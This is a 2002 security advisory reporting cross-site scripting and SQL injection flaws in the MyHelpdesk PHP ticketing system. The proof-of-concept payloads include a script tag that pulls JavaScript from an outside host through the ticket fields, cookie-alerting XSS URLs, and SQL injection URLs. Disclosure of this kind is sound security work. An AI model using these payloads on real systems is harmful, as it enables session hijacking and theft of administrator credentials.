[ARL02-A15] Multiple Security Issues in MyHelpdesk

[Ahmet Sabri ALPER <s_alper () hotmail com>]

+/--------\-------- ALPER Research Labs ------/--------/+
+/---------\-------  Security Advisory  -----/---------/+
+/----------\------    ID: ARL02-A15    ----/----------/+
+/-----------\----- salper () olympos org  ---/-----------/+


Advisory Information
--------------------
Name               : Multiple Security Issues in MyHelpdesk
Software Package   : MyHelpdesk
Vendor Homepage    : http://myhelpdesk.sourceforge.net/
Vulnerable Versions: v20020509 and older
Platforms          : OS Independent, PHP
Vulnerability Type : Input Validation Error
Vendor Contacted   : 01/06/2002
Vendor Replied     : 02/06/2002
Prior Problems     : N/A
Current Version    : v20020509 (vulnerable)


Summary
-------
MyHelpdesk is a PHP/MySQL Helpdesk system based on the 
OneOrZero Helpdesk but with a different set of features. 
The system is appropriate for the Support Desk of small 
organizations.

Multiple Cross Site Scripting and SQL injection problems 
exist within "MyHelpdesk".


Details
-------
1. When a support assistant creates a new ticket, the Title 
and Description input is not filtered for malicious code, 
therefore they allow Cross Site Scripting attacks, which may 
provide any supporter, the administrator password if the issue 
is exploited correctly.
Proof-of-concept input for Title and/or Description fields:
<script src="http://forum.olympos.org/f.js";>Alper</script>


2. Maliciously crafted links from third party sites may allow 
Cross Site Scripting attacks. This can be accomplished via three 
different functions of index.php:
http://[TARGET]/supporter/index.php?t=tickettime&id=<script>alert
(document.cookie)</script>
http://[TARGET]/supporter/index.php?t=ticketfiles&id=<script>alert
(document.cookie)</script>
http://[TARGET]/supporter/index.php?t=updateticketlog&id=<script>alert
(document.cookie)</script>

3. Also when any ticket is edited, the update section 
also is not filtered correctly and may carry malicious code.

4. Three different functions of the "index.php" allows passage 
of user input directly to the SQL query. This makes it possible 
for attackers to launch SQL injection attacks.

http://[TARGET]/supporter/index.php?t=detailticket&id=root%20me
http://[TARGET]/supporter/index.php?t=editticket&id=got%20root
http://[TARGET]/supporter/index.php?t=updateticketlog&id=without%20me


Solution
--------
The vendor stated in his reply that MyHelpDesk was 
designed for internal use for small organizations, and 
such issues would not do much harm for internal 
systems.

Workaround;
Filter the $id, $title, $description variables for 
malicious code.


Credits
-------
Discovered on 01, June, 2002 by 
Ahmet Sabri ALPER <salper () olympos org>
ALPER Research Labs.

The ALPER Research Labs. [ARL] workers are freelancer 
security professionals and WhiteHat hackers. The ARL 
workers are available for hiring for legal jobs.
The ARL also supports Open Software Community, by detecting 
possible security issues in GPL or any other Public Licensed 
product.


References
----------
Product Web Page: http://myhelpdesk.sourceforge.net/
Olympos: http://www.olympos.org/